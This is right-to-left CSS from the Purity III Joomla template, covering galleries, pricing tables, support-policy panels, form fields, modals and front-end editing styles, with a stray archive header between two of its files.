  border: 1px solid #eeeeee;
  padding: 3px;
  -webkit-transition: border-color 0.2s ease-in;
  -o-transition: border-color 0.2s ease-in;
  transition: border-color 0.2s ease-in;
}
.row-feature .gallery .thumbnail a img {
  width: 100%;
  padding: 0;
}
.row-feature .gallery .thumbnail a:hover,
.row-feature .gallery .thumbnail a:focus,
.row-feature .gallery .thumbnail a:active {
  border-color: #bbbbbb;
}
.row-feature .gallery .thumbnail a:hover img,
.row-feature .gallery .thumbnail a:focus img,
.row-feature .gallery .thumbnail a:active img {
  opacity: .7;
}
.support-policy .row-support-policy {
  margin-bottom: 20px;
}
.support-policy .policy-item {
  margin-bottom: 20px;
  border: 1px solid #eeeeee;
}
.support-policy .policy-item .col-type {
  position: relative;
  height: 100px;
  border-bottom: 1px solid #eeeeee;
  background: #f7f7f7;
}
.support-policy .policy-item .col-type h3 {
  position: absolute;
  bottom: 10px;
  right: 20px;
}
.support-policy .policy-item .col-detail {
  height: 200px;
  padding: 20px;
}
.support-policy .policy-item .col-level {
  height: 80px;
  background: #444444;
  color: #fff;
  position: relative;
}
.support-policy .policy-item .col-level .face,
.support-policy .policy-item .col-level .count-up,
.support-policy .policy-item .col-level > strong {
  height: 80px;
  line-height: 80px;
}
.support-policy .policy-item .col-level .level-info {
  width: 160px;
  position: absolute;
  right: 0;
  bottom: 0;
}
.support-policy .policy-item .col-level .level-info .face {
  background-image: url(../../../images/emoticons.png);
  background-repeat: no-repeat;
  background-color: rgba(0, 0, 0, 0.35);
  display: table-cell;
  width: 80px;
  border-left: 1px solid rgba(0, 0, 0, 0.2);
}
.support-policy .policy-item .col-level .level-info .count-up {
  width: 80px;
  border-left: 1px solid rgba(0, 0, 0, 0.2);
  background-color: rgba(0, 0, 0, 0.15);
  display: table-cell;
  vertical-align: middle;
  text-align: center;
  font-size: 18px;
  font-weight: bold;
}
.support-policy .policy-item .col-level strong {
  width: 100%;
  color: #ffffff;
  display: block;
  float: right;
  font-weight: bold;
  padding-right: 180px;
  font-size: 18px;
}
.support-policy .policy-item .col-level.level-1 strong {
  background: #3e9b52;
}
.support-policy .policy-item .col-level.level-1 .face {
  background-position: 0px 0px;
}
.support-policy .policy-item .col-level.level-2 strong {
  background: #2f773f;
}
.support-policy .policy-item .col-level.level-2 .face {
  background-position: 0px -80px;
}
.support-policy .policy-item .col-level.level-3 strong {
  background: #ffcc00;
}
.support-policy .policy-item .col-level.level-3 .face {
  background-position: 0px -160px;
}
.support-policy .policy-item .col-level.level-4 strong {
  background: #cca300;
}
.support-policy .policy-item .col-level.level-4 .face {
  background-position: 0px -240px;
}
.support-policy .policy-item .col-level.level-5 strong {
  background-color: #ff8800;
}
.support-policy .policy-item .col-level.level-5 .face {
  background-position: 0px -320px;
}
.support-policy .policy-item .col-level.level-6 strong {
  background: #cc0000;
}
.support-policy .policy-item .col-level.level-6 .face {
  background-position: 0px -400px;
}
.support-policy:hover {
  background: #ffffff;
  border-color: #eeeeee;
}
.support-policy:hover .level-info .face {
  top: -70px;
}
.support-policy:hover .level-info .count-up {
  bottom: 0;
}
.support-policy.style2 {
  margin-bottom: 60px;
}
.support-policy .row-heading {
  background: #444444;
  color: #ffffff;
  overflow: hidden;
}
@media screen and (min-width: 768px) {
  .support-policy .row-heading {
    display: table;
    width: 100%;
  }
}
.support-policy .row-heading > div {
  border-left: 1px solid #5e5e5e;
  font-size: 12px;
  font-weight: bold;
  padding: 20px;
}
@media screen and (min-width: 768px) {
  .support-policy .row-heading > div {
    font-size: 15px;
    display: table-cell;
  }
}
.support-policy .row-body {
  border-right: 1px solid #eeeeee;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body {
    display: table;
    width: 100%;
    margin-bottom: 0;
  }
}
.support-policy .row-body > div {
  border-left: 1px solid #eeeeee;
  border-bottom: 1px solid #eeeeee;
  padding: 10px 20px;
  vertical-align: middle;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body > div {
    display: table-cell;
    float: none;
  }
}
.support-policy .row-body .col-type {
  background: #444444;
  color: #ffffff;
  font-size: 16px;
  font-weight: bold;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body .col-type {
    background: transparent;
    color: #444444;
  }
}
.support-policy .row-body .col-level {
  font-size: 32px;
  text-align: center;
}
.support-policy .row-body .col-status {
  border-bottom: 0;
}
.support-policy .row-body .col-status .face {
  background-image: url(../../../images/emoticons.png);
  background-repeat: no-repeat;
  display: block;
  height: 80px;
  margin: 0 auto;
  width: 80px;
}
.support-policy .row-body .col-status strong {
  color: #ffffff;
  display: block;
  padding: 3px 0;
  text-align: center;
}
.support-policy .row-body.level-1 .col-status {
  background: #3e9b52;
}
.support-policy .row-body.level-1 .col-status .face {
  background-position: 0px 0px;
}
.support-policy .row-body.level-2 .col-status {
  background: #44aa5a;
}
.support-policy .row-body.level-2 .col-status .face {
  background-position: 0px -80px;
}
.support-policy .row-body.level-3 .col-status {
  background: #4bb762;
}
.support-policy .row-body.level-3 .col-status .face {
  background-position: 0px -160px;
}
.support-policy .row-body.level-4 .col-status {
  background: #59bd6f;
}
.support-policy .row-body.level-4 .col-status .face {
  background-position: 0px -240px;
}
.support-policy .row-body.level-5 .col-status {
  background: #68c37b;
}
.support-policy .row-body.level-5 .col-status .face {
  background-position: 0px -320px;
}
.support-policy .row-body.level-6 .col-status {
  background: #77c888;
}
.support-policy .row-body.level-6 .col-status .face {
  background-position: 0px -400px;
}
.support-policy .row-alt {
  background: #f7f7f7;
}
.support-policy .support-yes {
  color: #3e9b52;
}
.support-policy .support-no {
  color: #e1e1e1;
}
.pricing-table {
  padding-top: 40px;
  padding-bottom: 100px;
}
.pricing-table .col {
  margin-bottom: 40px;
}
@media (min-width: 992px) {
  .pricing-table .col {
    margin-bottom: 0;
  }
}
@media (min-width: 768px) {
  .pricing-table .col.no-padding {
    padding: 0;
  }
}
@media (min-width: 768px) {
  .pricing-table .col.shadow {
    box-shadow: 0 5px 0 0 rgba(0, 0, 0, 0.2);
  }
}
.pricing-table .col .big-number {
  display: inline-block;
  font-size: 70px;
}
.pricing-table .col .big-number sup {
  font-size: 28px;
  top: -1em;
}
.pricing-table .col .btn {
  font-size: 20px;
  padding: 10px 20px;
}
.pricing-table .col .col-header {
  background: #666666;
  color: #ffffff;
  padding: 10px 20px;
}
.pricing-table .col ul {
  border: 1px solid #eeeeee;
  border-bottom: 0;
  list-style: none;
  margin: 0;
  padding: 0;
}
.pricing-table .col ul li {
  border-bottom: 1px solid #eeeeee;
  font-size: 16px;
  padding: 10px 20px;
  text-align: center;
}
.pricing-table .col ul li.row1 {
  background: #f7f7f7;
}
.pricing-table .col ul li i {
  color: #3e9b52;
  font-size: 18px;
}
.pricing-table .col ul li.no i {
  color: #cc0000;
}
.pricing-table .col ul li.no {
  color: #999999;
  text-decoration: line-through;
}
.pricing-table .col .col-footer {
  background: #eeeeee;
  border: 1px solid #d5d5d5;
  padding: 20px;
}
.pricing-table .col-feature {
  z-index: 200;
}
@media screen and (min-width: 992px) {
  .pricing-table .col-feature {
    margin-top: -20px;
  }
}
.pricing-table .col-feature .col-header {
  background: #ff8800;
  padding: 20px 20px;
}
.pricing-table.style2 .col:first-child .col-header {
  border-radius: 0 5px 0 0;
}
.pricing-table.style2 .col:first-child .col-footer {
  border-radius: 0 0 5px 0;
}
.pricing-table.style2 .col:last-child .col-header {
  border-radius: 5px 0 0 0;
}
.pricing-table.style2 .col:last-child .col-footer {
  border-radius: 0 0 0 5px;
}
.pricing-table.style2 .col-feature {
  border-radius: 5px;
}
.pricing-table.style2 .col-feature .col-header {
  border-radius: 5px 5px 0 0;
}
.pricing-table.style2 .col-feature .col-footer {
  border-radius: 0 0 5px 5px;
}
.our-team .lead {
  margin-bottom: 60px;
}
.our-team .thumbnail {
  text-align: center;
  border: 0;
  padding: 0 20px;
}
.our-team .thumbnail .caption {
  padding-bottom: 20px;
}
.our-team .thumbnail h3 {
  margin-bottom: 5px;
}
.our-team .thumbnail .btn {
  border-radius: 50%;
  height: 32px;
  line-height: 32px;
  margin: 0 2px;
  padding: 0;
  text-align: center;
  width: 32px;
}
.our-team .thumbnail .btn:hover {
  background: #ff8800;
  border-color: #ff8800;
  color: #ffffff;
}
.control-group .controls script + .row-fluid {
  margin-right: 0;
}
.control-group .controls script + .row-fluid + .row-fluid {
  margin-right: 0;
}
.video-wrapper {
  position: relative;
  padding-bottom: 51%;
  padding-top: 30px;
  height: 0;
}
.video-wrapper iframe {
  position: absolute;
  top: 0;
  right: 0;
  width: 100%;
  height: 100%;
}

.sr-only,
.visually-hidden,
.visually-hidden-focusable:not(:focus):not(:focus-within) {
  position: absolute !important;
  width: 1px !important;
  height: 1px !important;
  padding: 0 !important;
  margin: -1px !important;
  overflow: hidden !important;
  clip: rect(0, 0, 0, 0) !important;
  white-space: nowrap !important;
  border: 0 !important;
}
.btn-close {
  background: #f0f0f0;
  border: 0;
  border-radius: 50%;
  color: #999;
  height: 32px;
  text-align: center;
  width: 32px;
  margin-right: auto;
  appearance: none;
  -moz-appearance: none;
  -webkit-appearance: none;
}
.btn-close::before {
  content: "\f00d";
  display: block;
  font-family: FontAwesome3 !important;
  font-size: 16px;
}
.btn-close:hover {
  cursor: pointer;
  color: #666;
}
.field-calendar .input-group input[type="text"] {
  border-left: 0;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.field-calendar .input-group .btn {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.field-calendar a:hover,
.field-calendar a:focus,
.field-calendar a:active {
  cursor: pointer;
}
joomla-field-custom.field-custom-wrapper .input-group {
  display: flex;
  align-items: stretch;
}
joomla-field-custom.field-custom-wrapper .input-group input[type="text"] {
  border-left: 0;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn {
  display: flex;
  align-items: stretch;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn {
  border-radius: 0;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-select {
  background-color: #2f7d32;
  border-color: #2f7d32;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-select:hover,
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-select:focus,
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-select:active {
  background-color: #296e2c;
  border-color: #296e2c;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-clear {
  background-color: #c52827;
  border: 1px solid #c52827;
  border-top-left-radius: 5px;
  border-bottom-left-radius: 5px;
  color: #fff;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-clear:hover,
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-clear:focus,
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-clear:active {
  background-color: #ae2322;
  border-color: #c52827;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn span {
  line-height: 38px;
}
.input-group {
  position: relative;
  display: flex;
  flex-wrap: nowrap;
  align-items: stretch;
  width: 100%;
}
.input-group .form-control {
  width: auto;
}
.input-group .btn {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.com-tags-tag.tag-category .filters {
  display: flex;
  align-items: center;
}
.users-profile-custom-joomlatoken .dl-horizontal dd {
  text-overflow: ellipsis;
  overflow: hidden;
  white-space: nowrap;
  width: 400px;
}
.com-finder .form-inline > label {
  margin-bottom: 10px;
}
.com-finder .input-group {
  display: flex;
  align-items: center;
}
.com-finder .input-group .btn:last-of-type {
  border-radius: 5px;
  margin-right: 10px;
}
.j40 joomla-field-media .input-group {
  max-width: 356px;
}
.j40 joomla-field-media .input-group input[type="text"] {
  border-left: 0;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.j40 joomla-field-media .input-group .form-control {
  border-top-right-radius: 0;
  flex: 1;
}
.j40 joomla-field-media .input-group .btn {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.j40 joomla-field-media .input-group .icon-times::before {
  content: "\f00d";
  display: inline-block;
  font-weight: FontAwesome;
  font-size: 16px;
}
.j40 .form-control-feedback {
  font-size: 12px;
  font-weight: 400;
  top: auto;
  bottom: -28px;
  line-height: 1;
  width: auto;
  white-space: nowrap;
}
.j40 .com-newsfeeds-newsfeed__items {
  margin: 0;
  padding: 0;
  list-style: none;
}
.j40 .com-newsfeeds-newsfeed__items li {
  border-bottom: 1px solid #eeeeee;
  padding: 20px 0;
}
.j40 .com-newsfeeds-newsfeed__items .feed-link {
  margin-bottom: 20px;
}
.j40 figure {
  margin-bottom: 20px;
}
.j40 figure img {
  max-width: 100%;
}
.j40 #com-contact-form {
  margin-bottom: 20px;
}
.j40 .request-confirm fieldset legend {
  font-size: 16px;
  padding-bottom: 20px;
}
.j40 .article-aside .icons {
  float: left;
}
.j40 .article-aside .icons a {
  display: block;
  position: relative;
}
.j40 .article-aside .icons [role="tooltip"] {
  background-color: rgba(0, 0, 0, 0.6);
  border-radius: 3px;
  color: #fff;
  display: none;
  padding: 2px 4px;
  position: absolute;
  white-space: nowrap;
  left: 0;
  max-width: none;
}
.j40 .article-aside .icons:hover [role="tooltip"] {
  display: block;
}
.j40 .password-group .input-group {
  display: flex;
  flex-wrap: nowrap;
}
.j40 .password-group .input-group input {
  width: auto;
}
.j40 .edit.item-page .choices__inner {
  padding-left: 6px;
}
.j40 .edit.item-page .choices__inner button {
  background-color: rgba(255, 255, 255, 0.3);
  border-radius: 8px;
  border: 0;
  margin-right: 6px;
  padding: 1px 6px;
}
.j40 .edit.item-page .choices__inner button:hover,
.j40 .edit.item-page .choices__inner button:focus,
.j40 .edit.item-page .choices__inner button:active {
  background-color: rgba(255, 255, 255, 0.5);
  cursor: pointer;
}
.profile-edit .password-group .input-group input {
  min-width: 268px;
}
.profile-edit .control-group {
  margin-top: 20px;
}
.profile-edit .control-group .controls {
  float: none;
}
.j40 .joomla-modal.show,
.j42 .joomla-modal.show {
  background-color: rgba(0, 0, 0, 0.5);
  opacity: 1;
}
.j40 .joomla-modal.show .modal-dialog,
.j42 .joomla-modal.show .modal-dialog {
  top: 50%;
  transform: translateY(-50%);
}
.j40 .joomla-modal.show .modal-dialog .modal-content,
.j42 .joomla-modal.show .modal-dialog .modal-content {
  border-radius: 5px;
  box-shadow: 0 0 5px rgba(0, 0, 0, 0.1);
}
.j40 .jviewport-width80,
.j42 .jviewport-width80 {
  width: 80vw;
}
.j40 .jviewport-height70,
.j42 .jviewport-height70 {
  height: 70vh;
}
.j40 .modal-header,
.j42 .modal-header {
  align-items: center;
  border-bottom: 1px solid #ddd;
  display: flex;
  padding: 12px 16px;
  justify-content: space-between;
}
.j40 .modal-header h3,
.j42 .modal-header h3 {
  font-size: 24px;
  font-weight: 500;
}
.j40 .modal-body,
.j42 .modal-body {
  overflow: hidden;
  padding: 0;
}
.j40 .iframe,
.j42 .iframe {
  border: 0;
  height: 100%;
  width: 100%;
}
.j40 [role=tooltip]:not(.show),
.j42 [role=tooltip]:not(.show) {
  left: 5em;
  z-index: 1070;
  display: none;
  max-width: 100%;
  padding: .5em;
  margin: .5em;
  color: #000;
  text-align: start;
  background: #fff;
  border: 1px solid #6d757e;
  border-radius: .25rem;
}
.j40 .container-popup [id="filter[search]-desc"],
.j42 .container-popup [id="filter[search]-desc"] {
  top: 100%;
  bottom: auto;
}
.j40 .btn-toolbar,
.j40 .js-stools-container-filters {
  display: flex;
  flex-wrap: wrap;
  justify-content: flex-end;
  align-items: center;
}
.j40 .ordering-select {
  display: flex;
  align-items: center;
}
.j40 .btn-group {
  margin-left: 10px;
}
.j40 .js-stools-container-filters {
  display: none;
  margin-top: 20px;
}
.j40 .js-stools-container-filters.js-stools-container-filters-visible {
  display: flex;
}
.j40 .js-stools-container-filters .js-stools-field-filter {
  margin-left: 10px;
}
.j40 .js-stools-container-filters .js-stools-field-filter:last-child {
  margin-left: 0;
}
.j40 .js-stools-container-filters .choices .choices__inner {
  border: 0;
  min-height: auto;
  padding: 0;
}
.j40 .js-stools-container-filters .choices .choices__inner input {
  margin-bottom: 0;
}
.j40 #contact-form label.required {
  position: relative;
}
.j40 #contact-form label.required .form-control-feedback {
  background: #fff;
  border-radius: .5rem;
  box-shadow: 2px 2px 5px rgba(0, 0, 0, 0.1);
  border: 1px solid #e5e7eb;
  display: flex;
  align-items: center;
  justify-content: center;
  padding: 0 .5rem;
  left: auto;
  right: calc(132%);
  bottom: calc(132%);
}
.contentpane .subhead {
  border-bottom: 1px solid #ddd;
  padding-bottom: 12px;
}
.contentpane .subhead .btn-toolbar {
  display: flex;
  gap: 10px;
  margin: 0;
}
.contentpane .subhead .btn-toolbar::before,
.contentpane .subhead .btn-toolbar::after {
  display: none;
}
.contentpane .media-sidebar {
  border-left: 1px solid #ddd;
}
.contentpane .media-toolbar {
  border-bottom: 1px solid #ddd;
  margin-left: 20px;
  padding-right: 20px;
}
.contentpane .media-toolbar .media-toolbar-icon {
  border-right: 1px solid #ddd;
}
.contentpane .media-toolbar .icon-search-minus,
.contentpane .media-toolbar .icon-search-plus {
  font-family: FontAwesome3;
}
.contentpane .media-toolbar .icon-search-minus::before,
.contentpane .media-toolbar .icon-search-plus::before {
  content: "\f010";
  display: block;
  font-size: 16px;
}
.contentpane .media-toolbar .icon-search-plus::before {
  content: "\f00e";
}
.com_contact fieldset.filters {
  display: flex;
  flex-wrap: wrap;
  justify-content: space-between;
}
.com_contact .com-contact-featured__filter {
  display: flex;
  flex-wrap: wrap;
}
.com_contact .display-limit {
  margin: 0;
}
.com_contact table.category {
  margin-top: 2rem;
}



.off-canvas body > .autocompleter-choices {
  width: 0px;
  left: auto;
}
article img[align=left],
.img_caption.left,
.pull-left.item-image {
  margin: 0 40px 20px 0;
}
article img[align=right],
.img_caption.right,
.pull-right.item-image {
  margin: 0 0 20px 40px;
}
.languageswitcherload ul {
  float: left;
}PKӜ�\�1�8�H�H$purity_iii/css/rtl/frontend-edit.cssnu&1i�.com_config .btn,
.com_content.layout-edit .edit.item-page .btn,
.layout-modal .contentpane .btn {
  border-radius: 5px;
  padding: 8px 16px;
}
.com_config input[type="text"],
.com_content.layout-edit .edit.item-page input[type="text"],
.layout-modal .contentpane input[type="text"],
.com_config input[type="email"],
.com_content.layout-edit .edit.item-page input[type="email"],
.layout-modal .contentpane input[type="email"],
.com_config input[type="number"],
.com_content.layout-edit .edit.item-page input[type="number"],
.layout-modal .contentpane input[type="number"],
.com_config input[type="password"],
.com_content.layout-edit .edit.item-page input[type="password"],
.layout-modal .contentpane input[type="password"] {
  box-shadow: none;
  border-radius: 5px;
  padding: 0 12px;
  height: 40px;
  line-height: 40px;
}
.com_config input[type="text"]:focus,
.com_content.layout-edit .edit.item-page input[type="text"]:focus,
.layout-modal .contentpane input[type="text"]:focus,
.com_config input[type="email"]:focus,
.com_content.layout-edit .edit.item-page input[type="email"]:focus,
.layout-modal .contentpane input[type="email"]:focus,
.com_config input[type="number"]:focus,
.com_content.layout-edit .edit.item-page input[type="number"]:focus,
.layout-modal .contentpane input[type="number"]:focus,
.com_config input[type="password"]:focus,
.com_content.layout-edit .edit.item-page input[type="password"]:focus,
.layout-modal .contentpane input[type="password"]:focus {
  border-color: #ccc;
}
.com_config textarea,
.com_content.layout-edit .edit.item-page textarea,
.layout-modal .contentpane textarea {
  border: 1px solid #ddd;
  border-radius: 5px;
  box-shadow: none;
}
.com_config textarea:focus,
.com_content.layout-edit .edit.item-page textarea:focus,
.layout-modal .contentpane textarea:focus {
  box-shadow: none;
  border: 1px solid #ccc;
}
.com_config select,
.com_content.layout-edit .edit.item-page select,
.layout-modal .contentpane select {
  border-radius: 5px;
  height: auto;
  padding: 8px;
}
.com_config .input-group .btn,
.com_content.layout-edit .edit.item-page .input-group .btn,
.layout-modal .contentpane .input-group .btn {
  padding-top: 0;
  padding-bottom: 0;
}
.com_config #templates-form .tip {
  background: #f5f5f5;
  padding: 12px 12px;
}
.com_config #templates-form textarea {
  height: auto;
  width: auto;
  min-height: 100px;
  min-width: 50%;
}
.com_config #templates-form .input-append .add-on,
.com_config #templates-form .input-prepend .add-on {
  width: 35px;
}
.com_config #templates-form .input-append input,
.com_config #templates-form .input-prepend input {
  display: inline-block;
}
.com_config #templates-form .input-append .btn,
.com_config #templates-form .input-prepend .btn {
  border: 1px solid #cccccc;
}
.com_config #templates-form .t3-admin-form-legend {
  display: none;
}
.com_config #templates-form .row-fluid .span6 {
  width: 100%;
}
@media (min-width: 768px) {
  .com_config #templates-form .control-group .control-label {
    width: 250px;
  }
  .com_config #templates-form .control-group .controls {
    margin-right: 280px;
  }
}
.com_config.view-modules #options .accordion-item {
  background-color: #ffffff;
  border: 1px solid #ddd;
  border-radius: 5px;
  margin-bottom: 8px;
}
.com_config.view-modules #options .accordion-header {
  font-size: 18px;
  margin: 0;
  padding: 16px;
  line-height: 1;
}
.com_config.view-modules #options .accordion-header .accordion-button {
  background: transparent;
  border: 0;
  padding: 0;
  text-align: right;
  width: 100%;
}
.com_config.view-modules #options .accordion-body {
  border-top: 1px solid #ddd;
  padding: 24px;
}
.com_config.view-modules #options .accordion-body .nav-tabs {
  background: transparent;
}
.com_config #modules-form .input-append .add-on,
.com_config #modules-form .input-prepend .add-on {
  width: 35px;
}
.com_config #modules-form .input-append input,
.com_config #modules-form .input-prepend input {
  display: inline-block;
}
.com_config #modules-form .input-append .btn,
.com_config #modules-form .input-prepend .btn {
  border: 1px solid #cccccc;
}
.com_config #modules-form .accordion-group {
  margin-bottom: 20px;
}
.com_config #modules-form .accordion-group .accordion-heading .accordion-toggle {
  border: 1px solid #ddd;
  border-radius: 5px 5px 0 0;
  color: #428bca;
  display: block;
  padding: 10px;
  outline: none;
}
.com_config #modules-form .accordion-group .accordion-heading .accordion-toggle.collapsed {
  border-radius: 5px;
  color: #666;
}
.com_config #modules-form .accordion-group .accordion-body {
  border: 1px solid #ddd;
  border-top: 0;
  border-radius: 0 0 5px 5px;
  padding-top: 20px;
}
.com_config #modules-form .accordion-group .accordion-body .nav-tabs {
  border-bottom: 0;
}
.com_config #modules-form .radio input[type="radio"] {
  margin-right: 0;
  position: relative;
}
.com_config #modules-form .radio label {
  padding-right: 5px;
  padding-left: 20px;
}
.controls select {
  vertical-align: middle;
  width: 220px;
}
@media (min-width: 768px) {
  .edit .inputbox,
  .edit input[type="text"],
  .edit select.inputbox,
  .edit select {
    width: 250px;
  }
}
.edit textarea {
  width: 100%;
}
.edit .input-append,
.edit .input-prepend {
  display: block;
  width: auto;
}
@media (min-width: 768px) {
  .edit .input-append input[type="text"],
  .edit .input-prepend input[type="text"],
  .edit .input-append input.inputbox,
  .edit .input-prepend input.inputbox {
    display: inline-block;
    width: 210px;
  }
}
.edit .input-append .btn,
.edit .input-prepend .btn {
  border: 1px solid #cccccc;
  background-color: #ffffff;
}
.edit.item-page #jform_com_fields_checkboxs label.checkbox,
.profile-edit #jform_com_fields_checkboxs label.checkbox {
  display: inline-block;
  margin-left: 10px;
}
.edit.item-page #jform_com_fields_checkboxs input[type="checkbox"],
.profile-edit #jform_com_fields_checkboxs input[type="checkbox"] {
  margin-right: 0;
  margin-top: -2px;
  position: relative;
  vertical-align: middle;
  width: auto;
}
.edit.item-page .minicolors-input,
.profile-edit .minicolors-input {
  height: 28px;
  width: auto;
}
.edit.item-page .chzn-container .chzn-search:before,
.profile-edit .chzn-container .chzn-search:before,
.edit.item-page .chzn-container .chzn-search:after,
.profile-edit .chzn-container .chzn-search:after {
  display: table;
  content: " ";
}
.edit.item-page .chzn-container .chzn-search:after,
.profile-edit .chzn-container .chzn-search:after {
  clear: both;
}
.profile-edit #jform_com_fields_user_checkbox label.checkbox {
  display: inline-block;
  margin-left: 10px;
}
.profile-edit #jform_com_fields_user_checkbox input {
  position: relative;
  margin-right: 0;
  margin-left: 5px;
  width: auto;
}
.profile-edit .minicolors-input {
  height: 28px;
  width: auto;
}
.profile-edit #jform_com_fields_user_image_chzn .chzn-search {
  box-sizing: border-box;
}
.profile-edit #jform_com_fields_user_image_chzn ul.chzn-results {
  box-sizing: border-box;
  padding: 0;
  margin: 0;
  width: 100%;
}
.profile-edit #jform_com_fields_user_calendar {
  float: right;
}
.profile-edit .chzn-container-single,
.profile-edit .chzn-container {
  float: right;
  margin-left: 10px;
}
@media screen and (max-width: 360px) {
  .profile-edit .chzn-container-single,
  .profile-edit .chzn-container {
    width: 100% !important;
  }
}
.profile-edit .chzn-container-single .chzn-drop,
.profile-edit .chzn-container .chzn-drop {
  box-sizing: border-box !important;
}
.j40 .profile-edit .t3onoff,
.j50 .profile-edit .t3onoff {
  min-height: auto;
  border: 0;
  height: auto;
  width: auto;
}
.j40 .profile-edit .t3onoff .radio,
.j50 .profile-edit .t3onoff .radio {
  display: flex;
  align-items: center;
  min-height: auto;
  padding: 0;
}
.j40 .profile-edit .t3onoff .radio .form-check,
.j50 .profile-edit .t3onoff .radio .form-check {
  display: flex;
  align-items: center;
}
.j40 .profile-edit .t3onoff .radio .form-check input[type="radio"],
.j50 .profile-edit .t3onoff .radio .form-check input[type="radio"] {
  display: inline-block;
}
.j40 .profile-edit .t3onoff label,
.j50 .profile-edit .t3onoff label {
  padding: 0;
  margin: 0;
  position: relative;
  top: auto;
  right: auto;
  height: auto;
  text-indent: 0;
  text-transform: none;
  width: auto;
}
.j40 .profile-edit .t3onoff label.active,
.j50 .profile-edit .t3onoff label.active {
  background: transparent;
}
.j40 .profile-edit .t3onoff label::before,
.j50 .profile-edit .t3onoff label::before,
.j40 .profile-edit .t3onoff label::after,
.j50 .profile-edit .t3onoff label::after {
  display: none;
}
.profile #users-profile-core {
  width: 100%;
}
.profile .dl-horizontal dd {
  margin-bottom: 10px;
  border-bottom: 1px dashed #ddd;
  padding-bottom: 10px;
}
.profile .dl-horizontal dd img {
  max-width: 100%;
}
.edit .nav-tabs {
  margin-bottom: 20px;
}
.edit .tab-pane:before,
.edit .tab-pane:after {
  display: table;
  content: " ";
}
.edit .tab-pane:after {
  clear: both;
}
#editor-xtd-buttons,
.toggle-editor {
  margin-top: 20px;
  margin-bottom: 20px;
}
#editor-xtd-buttons .btn,
.toggle-editor .btn {
  background-color: #ffffff;
  text-shadow: 0 1px 0 #fff;
  border-color: #cccccc;
}
#editor-xtd-buttons {
  margin-left: 40px;
}
#sbox-window {
  padding: 0;
  -webkit-box-sizing: content-box;
  -moz-box-sizing: content-box;
  box-sizing: content-box;
}
.btn.jmodedit {
  padding: 0;
}
.btn.jmodedit:focus,
.btn.jmodedit:active {
  box-shadow: none;
}
.jfedit-menu + .tooltip {
  min-width: 100px;
}
.window form table {
  border: 1px solid #dddddd;
  background: #f9f9f9;
  margin-bottom: 20px;
}
.window form table td {
  padding: 8px;
}
.window form .help-block {
  font-size: 12px;
  clear: both;
  padding-top: 5px;
}
.window.view-modules .well .control-label {
  display: inline-block;
}
.window.view-modules .well .controls {
  display: inline-block;
  vertical-align: middle;
  margin-right: 10px;
}
.window.view-modules .control-group:after {
  content: "";
  clear: both;
  display: table;
}
.window.view-modules #filter-bar {
  margin-bottom: 10px;
}
.window.view-modules #filter-bar .btn-group button {
  margin-top: 0;
}
.com_config.view-modules .btn-group label {
  float: right;
  padding-right: 10px !important;
  padding-left: 10px !important;
}
.window #imageForm {
  margin: 0;
  width: auto;
}
.window #imageForm .chzn-container {
  float: right;
}
.window #imageForm #upbutton {
  border: 1px solid #cccccc;
  float: right;
  padding: 3px 12px;
  margin-right: 5px;
}
.window #imageForm .pull-right {
  margin-left: 40px;
}
.window #imageForm .well:after {
  display: table;
  content: "";
  clear: both;
}
.window #uploadForm {
  width: auto;
}
.window #uploadForm #upload-file {
  margin: 10px 0;
}
.window .manager {
  margin: 0;
  padding: 0;
}
.window .manager:before,
.window .manager:after {
  display: table;
  content: " ";
}
.window .manager:after {
  clear: both;
}
.window .manager .thumbnail {
  float: right;
  margin-left: 10px;
  margin-right: 10px;
}
.window.view-articles .filter {
  overflow: visible;
}
.window.view-articles .filter .btn-toolbar .icon-remove,
.window.view-articles .filter .btn-toolbar .icon-search {
  margin-left: 5px;
}
.window.view-articles .filters {
  float: none !important;
}
.window.view-articles .filters .chzn-container {
  display: inline-block;
}
.window.view-articles .filters .chzn-drop input {
  float: none;
}
.t3onoff {
  border: 1px solid #aaa;
  border-radius: 0;
  display: block;
  height: 30px;
  overflow: hidden;
  padding: 0;
  position: relative;
  white-space: nowrap;
  width: 90px;
  
  
  
  
  
}
.t3onoff input[type=radio] {
  display: none;
}
.t3onoff label {
  width: 90px;
  height: 30px;
  overflow: hidden;
  display: block;
  border-radius: 0;
  position: absolute;
  top: -1px;
  right: -1px;
  z-index: 1;
  text-transform: uppercase;
  background: url(../../../../plugins/system/t3/base-bs3/imgs/blank.gif) no-repeat transparent;
  text-indent: -999em;
}
.t3onoff label:before,
.t3onoff label:after {
  display: block;
  position: absolute;
  top: 0;
  border-radius: 0;
  -webkit-transition: all 250ms;
  -o-transition: all 250ms;
  transition: all 250ms;
}
.t3onoff label:before {
  content: "ON";
  width: 100%;
  height: 100%;
  text-indent: 0;
  color: white;
  padding: 4px 18px;
  font-weight: normal;
}
.t3onoff label:after {
  content: "";
  width: 40%;
  height: 100%;
  background: #fff;
}
.t3onoff label.off:before {
  content: "OFF";
  text-align: left;
  color: #555;
}
.t3onoff label.active {
  z-index: 0;
}
.t3onoff label.off:before {
  background: #eee;
  right: 100%;
}
.t3onoff label.off.active:before {
  right: 0%;
}
.t3onoff label.on:before {
  background: #690;
  right: -100%;
}
.t3onoff label.on.active:before {
  right: -0%;
}
.t3onoff label.off:after {
  right: 60%;
}
.t3onoff label.off.active:after {
  right: 0%;
}
